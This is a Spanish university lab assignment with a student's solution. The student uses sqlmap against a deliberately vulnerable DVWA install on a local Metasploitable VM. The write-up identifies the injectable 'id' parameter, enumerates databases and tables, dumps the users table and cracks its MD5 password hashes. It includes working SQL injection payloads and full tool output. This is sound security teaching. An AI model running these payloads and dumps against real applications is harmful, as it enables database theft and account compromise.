Asignatura Datos del alumno Fecha

Apellidos: Sánchez Rodríguez

Análisis de
3 de julio de 2017
vulnerabilidades
Nombre: Miguel Ángel

Actividades

Trabajo: Realizar ataques SQL Injection contra la aplicación

DVWA

En la siguiente actividad deberás realizar diversos ataques sobre la aplicación DVWA

utilizando la técnica de SQL injection.

Para ello, debes utilizar la herramienta SQLMap (instalada en Kali por defecto).

Se valorará positivamente que expliques debidamente los pasos seguidos para la

realización de cada ataque.

Tendrás que:

» Indicar cuál/cuáles son los parámetros vulnerables de la URL.

» Obtener los nombres de las bases de datos disponibles.
» Recuperar los nombres de las tablas de la base de datos dvwa.
» Recuperar el contenido de las tablas de la base de datos dvwa.

Extensión máxima: 10 páginas (Georgia 11 e interlineado 1,5).

TEMA 3 – Actividades © Universidad Internacional de La Rioja, S. A. (UNIR)

 Asignatura Datos del alumno Fecha
Apellidos: Sánchez Rodríguez
Análisis de
3 de julio de 2017
vulnerabilidades
Nombre: Miguel Ángel

Solución

Preparación requisitos previos

Se utilizará el siguiente entorno:
 Máquina real con Kali Linux actualizada, a la que se accede por SSH,
exportando las X para su uso desde otro ordenador.
 Máquina virtual con Metasploitable 2, con la IP 10.0.1.102.
 DVWA (última versión)
o Debido a que la versión que viene por defecto en Metasploitable 2 es la
1.0.7, de fecha 8/9/2010, se descarga e instala la última versión, 1.10 de
fecha 8/10/2015, en /var/www/dvwa_last, que será accesible a través de
la URL http://10.0.1.102/dvwa_last.
o Se copian los ficheros, se les dan permisos, y se configura el fichero
/var/www/dvwa_last/config/config.inc.php.
o En el apartado de Setup/Reset DB, se solucionan los problemas
indicados, dejando todo en verde (activar PHP allow_url_include, se
crea una cuenta para pruebas de reCAPTCHA, que aunque no se pide en
esta actividad, me sirve para dejar totalmente preparado el entorno para
futuros usos).
o Al ser el primer acceso, se pulsa en Create / Reset Database
o Se configura nivel de seguridad bajo (low).
 En la máquina Kali, se arranca OWASP-ZAP, se verifica que está funcionando
correctamente el servidor proxy local (en localhost:8080) y se configura Firefox
para que utilice dicho proxy.

Indicar cuál/cuáles son los parámetros vulnerables de la URL.

Se entra en la URL http://10.0.1.102/dvwa_last/, se inicia sesión y se selecciona la
vulnerabilidad SQL Injection.
Se analiza el código fuente de la página (botón View Source), y se observa que se
consultan los parámetros ‘id’ y ‘Submit’ (a través de $_REQUEST).
SQLmap necesita el id de la sesión. Se realiza una petición, y se captura en OWASP-ZAP.
La cabecera capturada es:
GET http://10.0.1.102/dvwa_last/vulnerabilities/sqli/?id=2&Submit=Submit HTTP/1.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0

TEMA 3 – Actividades © Universidad Internacional de La Rioja, S. A. (UNIR)

 Asignatura Datos del alumno Fecha
Apellidos: Sánchez Rodríguez
Análisis de
3 de julio de 2017
vulnerabilidades
Nombre: Miguel Ángel

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Referer: http://10.0.1.102/dvwa_last/vulnerabilities/sqli/
Cookie: security=low; PHPSESSID=b43bcfa6e47421c8f85f371d1677cdcc
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Host: 10.0.1.102

En el que se verifica que los parámetros enviados son: id y Submit, como se había visto
en el código fuente, y anotamos el campo Cookie para pasárselo a sqlmap.
Con estos datos, se lanza sqlmap en la máquina Kali:
root@pc1:~# sqlmap -u
'http://10.0.1.102/dvwa_last/vulnerabilities/sqli/?id=3&Submit=Submit' --
cookie='security=low; PHPSESSID=b43bcfa6e47421c8f85f371d1677cdcc' ___
__H__
___ ___[(]_____ ___ ___ {1.1.6#stable}
|_ -| . ["] | .'| . |
|___|_ [.]_|_|_|__,| _|
|_|V |_| http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is
illegal. It is the end user's responsibility to obey all applicable local, state and
federal laws. Developers assume no liability and are not responsible for any misuse or
damage caused by this program

[*] starting at 19:34:32

[19:34:32] [INFO] testing connection to the target URL

[19:34:32] [INFO] testing if the target URL is stable
[19:34:33] [INFO] target URL is stable
[19:34:33] [INFO] testing if GET parameter 'id' is dynamic
[19:34:33] [WARNING] GET parameter 'id' does not appear to be dynamic
[19:34:33] [INFO] heuristics detected web page charset 'ascii'
[19:34:33] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable
(possible DBMS: 'MySQL')
[19:34:34] [INFO] heuristic (XSS) test shows that GET parameter 'id' might be vulnerable to
cross-site scripting attacks
[19:34:34] [INFO] testing for SQL injection on GET parameter 'id'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for
other DBMSes? [Y/n]
for the remaining tests, do you want to include all tests for 'MySQL' extending provided
level (1) and risk (1) values? [Y/n]
[19:34:37] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[19:34:37] [WARNING] reflective value(s) found and filtering out
[19:34:38] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL
comment)'
[19:34:43] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[19:34:49] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
(NOT)'
[19:34:51] [INFO] GET parameter 'id' appears to be 'OR boolean-based blind - WHERE or
HAVING clause (MySQL comment) (NOT)' injectable (with --not-string="Bob")
[19:34:51] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP
BY clause (BIGINT UNSIGNED)'
[19:34:51] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE, HAVING clause (BIGINT
UNSIGNED)'
[19:34:51] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP
BY clause (EXP)'
[19:34:51] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE, HAVING clause (EXP)'
[19:34:52] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or
GROUP BY clause (JSON_KEYS)'
[19:34:52] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE, HAVING clause
(JSON_KEYS)'
[19:34:52] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP
BY clause (FLOOR)'

TEMA 3 – Actividades © Universidad Internacional de La Rioja, S. A. (UNIR)

 Asignatura Datos del alumno Fecha
Apellidos: Sánchez Rodríguez
Análisis de
3 de julio de 2017
vulnerabilidades
Nombre: Miguel Ángel

[19:34:52] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP
BY clause (FLOOR)'
[19:34:52] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP
BY clause (EXTRACTVALUE)'
[19:34:52] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP
BY clause (EXTRACTVALUE)'
[19:34:52] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP
BY clause (UPDATEXML)'
[19:34:52] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP
BY clause (UPDATEXML)'
[19:34:52] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP
BY clause (FLOOR)'
[19:34:52] [INFO] GET parameter 'id' is 'MySQL >= 4.1 AND error-based - WHERE, HAVING,
ORDER BY or GROUP BY clause (FLOOR)' injectable
[19:34:52] [INFO] testing 'MySQL inline queries'
[19:34:52] [INFO] testing 'MySQL > 5.0.11 stacked queries (comment)'
[19:34:52] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[19:34:52] [INFO] testing 'MySQL > 5.0.11 stacked queries (query SLEEP - comment)'
[19:34:53] [INFO] testing 'MySQL > 5.0.11 stacked queries (query SLEEP)'
[19:34:53] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)'
[19:34:53] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[19:34:53] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind'
[19:35:03] [INFO] GET parameter 'id' appears to be 'MySQL >= 5.0.12 AND time-based blind'
injectable
[19:35:03] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[19:35:03] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[19:35:03] [INFO] automatically extending ranges for UNION query injection technique tests
as there is at least one other (potential) technique found
[19:35:03] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time
needed to find the right number of query columns. Automatically extending the range for
current UNION query injection technique test
[19:35:04] [INFO] target URL appears to have 2 columns in query
[19:35:04] [INFO] GET parameter 'id' is 'MySQL UNION query (NULL) - 1 to 20 columns'
injectable
[19:35:04] [WARNING] in OR boolean-based injection cases, please consider usage of switch
'--drop-set-cookie' if you experience any problems during data retrieval
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y

… <Se omiten pruebas de Submit por claridad> …

sqlmap identified the following injection point(s) with a total of 3731 HTTP(s) requests:
---
Parameter: id (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) (NOT)
Payload: id=3' OR NOT 1788=1788#&Submit=Submit

Type: error-based
Title: MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
(FLOOR)
Payload: id=3' AND ROW(3249,6385)>(SELECT COUNT(*),CONCAT(0x717a6b7071,(SELECT
(ELT(3249=3249,1))),0x716a6b7071,FLOOR(RAND(0)*2))x FROM (SELECT 5836 UNION SELECT 8813
UNION SELECT 6164 UNION SELECT 3189)a GROUP BY x)-- hzfs&Submit=Submit

Type: AND/OR time-based blind

Title: MySQL >= 5.0.12 AND time-based blind
Payload: id=3' AND SLEEP(5)-- ORcj&Submit=Submit

Type: UNION query

Title: MySQL UNION query (NULL) - 2 columns
Payload: id=3' UNION ALL SELECT
CONCAT(0x717a6b7071,0x6a4569574c6e6764644b6c584a6b52586e4c777555427461586861554c55486d75464
b4e6c696641,0x716a6b7071),NULL#&Submit=Submit
---
[19:43:53] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 8.04 (Hardy Heron)
web application technology: PHP 5.2.4, Apache 2.2.8
back-end DBMS: MySQL >= 4.1
[19:43:53] [INFO] fetched data logged to text files under '/root/.sqlmap/output/10.0.1.102'

TEMA 3 – Actividades © Universidad Internacional de La Rioja, S. A. (UNIR)

 Asignatura Datos del alumno Fecha
Apellidos: Sánchez Rodríguez
Análisis de
3 de julio de 2017
vulnerabilidades
Nombre: Miguel Ángel

[*] shutting down at 19:43:53

Por tanto:
 El parámetro id SÍ es vulnerable.
 El parámetro Submit NO es vulnerable.
Además, ejecuto la línea anterior, añadiendo la opción –f, para además obtener la versión
exacta de MySQL, que es la 5.0.51, que nos permite buscar exploits (se encuentran
bastantes de DOS en exploit-db).

Obtener los nombres de las bases de datos disponibles.

Como sabemos que el gestor de base de datos es MySQL, ya le pasamos las opciones
--dbms=mysql --p id --dbs:
root@pc1:~# sqlmap -u
'http://10.0.1.102/dvwa_last/vulnerabilities/sqli/?id=3&Submit=Submit' --
cookie='security=low; PHPSESSID=b43bcfa6e47421c8f85f371d1677cdcc' --dbms=mysql -p id --
dbs
___
__H__
___ ___[.]_____ ___ ___ {1.1.6#stable}
|_ -| . [)] | .'| . |
|___|_ [,]_|_|_|__,| _|
|_|V |_| http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent
is illegal. It is the end user's responsibility to obey all applicable local, state and
federal laws. Developers assume no liability and are not responsible for any misuse or
damage caused by this program

[*] starting at 20:16:49

[20:16:49] [INFO] testing connection to the target URL

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) (NOT)
Payload: id=3' OR NOT 1788=1788#&Submit=Submit

Type: error-based
Title: MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
(FLOOR)
Payload: id=3' AND ROW(3249,6385)>(SELECT COUNT(*),CONCAT(0x717a6b7071,(SELECT
(ELT(3249=3249,1))),0x716a6b7071,FLOOR(RAND(0)*2))x FROM (SELECT 5836 UNION SELECT 8813
UNION SELECT 6164 UNION SELECT 3189)a GROUP BY x)-- hzfs&Submit=Submit

Type: AND/OR time-based blind

Title: MySQL >= 5.0.12 AND time-based blind
Payload: id=3' AND SLEEP(5)-- ORcj&Submit=Submit

Type: UNION query

Title: MySQL UNION query (NULL) - 2 columns
Payload: id=3' UNION ALL SELECT
CONCAT(0x717a6b7071,0x6a4569574c6e6764644b6c584a6b52586e4c777555427461586861554c55486d75
464b4e6c696641,0x716a6b7071),NULL#&Submit=Submit
---
[20:16:50] [INFO] testing MySQL

TEMA 3 – Actividades © Universidad Internacional de La Rioja, S. A. (UNIR)

 Asignatura Datos del alumno Fecha
Apellidos: Sánchez Rodríguez
Análisis de
3 de julio de 2017
vulnerabilidades
Nombre: Miguel Ángel

[20:16:50] [INFO] confirming MySQL

[20:16:50] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 8.04 (Hardy Heron)
web application technology: PHP 5.2.4, Apache 2.2.8
back-end DBMS: MySQL >= 5.0.0
[20:16:50] [INFO] fetching database names
[20:16:50] [WARNING] reflective value(s) found and filtering out
available databases [7]:
[*] dvwa
[*] information_schema
[*] metasploit
[*] mysql
[*] owasp10
[*] tikiwiki
[*] tikiwiki195

[20:16:50] [INFO] fetched data logged to text files under

'/root/.sqlmap/output/10.0.1.102'

[*] shutting down at 20:16:50

Por tanto, las bases de datos disponibles son dvwa, information_schema, metasploit,
mysql, owasp10, tikiwiki y tikiwiki195.

Recuperar los nombres de las tablas de la base de datos dvwa.

La opción a utilizar es --tables, que por defecto visualiza todas las tablas de todas las
bases de datos. Para visualizar sólo la base de datos dvwa, se añade también la opción -D
dvwa:
root@pc1:~# sqlmap -u
'http://10.0.1.102/dvwa_last/vulnerabilities/sqli/?id=2&Submit=Submit' --cookie
'security=low; PHPSESSID=b43bcfa6e47421c8f85f371d1677cdcc' --dbms=mysql -D dvwa --tables

… <Información omitida por claridad>

[20:42:52] [INFO] fetching tables for database: 'dvwa'

[20:42:52] [WARNING] reflective value(s) found and filtering out
Database: dvwa
[2 tables]
+-----------+
| guestbook |
| users |
+-----------+

[20:42:52] [INFO] fetched data logged to text files under

'/root/.sqlmap/output/10.0.1.102'

[*] shutting down at 20:42:52

De modo que las tablas de la base de datos dvwa son guestbook y users.

Recuperar el contenido de las tablas de la base de datos dvwa.

Se ejecuta la opción --dump, para volcar todo el contenido. Esto hace, además, que
SQLmap ofrezca un ataque sobre los hash encontrados:

TEMA 3 – Actividades © Universidad Internacional de La Rioja, S. A. (UNIR)

 Asignatura Datos del alumno Fecha
Apellidos: Sánchez Rodríguez
Análisis de
3 de julio de 2017
vulnerabilidades
Nombre: Miguel Ángel

root@pc1:~# sqlmap -u
'http://10.0.1.102/dvwa_last/vulnerabilities/sqli/?id=1&Submit=Submit' --cookie
'security=low; PHPSESSID=b43bcfa6e47421c8f85f371d1677cdcc' --dbms=mysql -D dvwa --dump

… <Información omitida por claridad>

[21:43:45] [INFO] fetching tables for database: 'dvwa'

[21:43:45] [INFO] fetching columns for table 'users' in database 'dvwa'
[21:43:45] [INFO] fetching entries for table 'users' in database 'dvwa'
[21:43:45] [WARNING] reflective value(s) found and filtering out
[21:43:45] [INFO] analyzing table dump for possible password hashes
[21:43:45] [INFO] recognized possible password hashes in column 'password'
do you want to store hashes to a temporary file for eventual further processing with
other tools [y/N]
do you want to crack them via a dictionary-based attack? [Y/n/q]
[21:43:52] [INFO] using hash method 'md5_generic_passwd'
what dictionary do you want to use?
[1] default dictionary file '/usr/share/sqlmap/txt/wordlist.zip' (press Enter)
[2] custom dictionary file
[3] file with list of dictionary files
> 1
[21:44:04] [INFO] using default dictionary
do you want to use common password suffixes? (slow!) [y/N]
[21:44:09] [INFO] starting dictionary-based cracking (md5_generic_passwd)
[21:44:09] [INFO] starting 4 processes
[21:44:11] [INFO] cracked password 'abc123' for hash 'e99a18c428cb38d5f260853678922e03'
[21:44:13] [INFO] cracked password 'charley' for hash '8d3533d75ae2c3966d7e0d4fcc69216b'
[21:44:15] [INFO] cracked password 'letmein' for hash '0d107d09f5bbe40cade3de5c71e9e9b7'
[21:44:18] [INFO] cracked password 'password' for hash
'5f4dcc3b5aa765d61d8327deb882cf99'
[21:44:21] [INFO] postprocessing table dump
Database: dvwa
Table: users
[5 entries]
+---------+--------------------------------------------------------+---------+----------
-----------------------------------+-----------+------------+---------------------+-----
---------+
| user_id | avatar | user | password
| last_name | first_name | last_login | failed_login |
+---------+--------------------------------------------------------+---------+----------
-----------------------------------+-----------+------------+---------------------+-----
---------+
| 1 | http://10.0.1.102/dvwa_last/hackable/users/admin.jpg | admin |
5f4dcc3b5aa765d61d8327deb882cf99 (password) | admin | admin | 2017-07-04
13:28:11 | 0 |
| 2 | http://10.0.1.102/dvwa_last/hackable/users/gordonb.jpg | gordonb |
e99a18c428cb38d5f260853678922e03 (abc123) | Brown | Gordon | 2017-07-04
13:28:11 | 0 |
| 3 | http://10.0.1.102/dvwa_last/hackable/users/1337.jpg | 1337 |
8d3533d75ae2c3966d7e0d4fcc69216b (charley) | Me | Hack | 2017-07-04
13:28:11 | 0 |
| 4 | http://10.0.1.102/dvwa_last/hackable/users/pablo.jpg | pablo |
0d107d09f5bbe40cade3de5c71e9e9b7 (letmein) | Picasso | Pablo | 2017-07-04
13:28:11 | 0 |
| 5 | http://10.0.1.102/dvwa_last/hackable/users/smithy.jpg | smithy |
5f4dcc3b5aa765d61d8327deb882cf99 (password) | Smith | Bob | 2017-07-04
13:28:11 | 0 |
+---------+--------------------------------------------------------+---------+----------
-----------------------------------+-----------+------------+---------------------+-----
---------+

[21:44:21] [INFO] table 'dvwa.users' dumped to CSV file

'/root/.sqlmap/output/10.0.1.102/dump/dvwa/users.csv'
[21:44:21] [INFO] fetching columns for table 'guestbook' in database 'dvwa'
[21:44:21] [INFO] fetching entries for table 'guestbook' in database 'dvwa'
[21:44:21] [INFO] analyzing table dump for possible password hashes
Database: dvwa
Table: guestbook
[1 entry]

TEMA 3 – Actividades © Universidad Internacional de La Rioja, S. A. (UNIR)

 Asignatura Datos del alumno Fecha
Apellidos: Sánchez Rodríguez
Análisis de
3 de julio de 2017
vulnerabilidades
Nombre: Miguel Ángel

+------------+------+-------------------------+
| comment_id | name | comment |
+------------+------+-------------------------+
| 1 | test | This is a test comment. |
+------------+------+-------------------------+

[21:44:21] [INFO] table 'dvwa.guestbook' dumped to CSV file

'/root/.sqlmap/output/10.0.1.102/dump/dvwa/guestbook.csv'
[21:44:21] [INFO] fetched data logged to text files under
'/root/.sqlmap/output/10.0.1.102'

[*] shutting down at 21:44:21

Con lo que se obtiene el contenido de las tablas users y guestbook (resaltado en amarillo
en la captura anterior), así como las contraseñas (calculadas con md5), de todos los
usuarios.

TEMA 3 – Actividades © Universidad Internacional de La Rioja, S. A. (UNIR)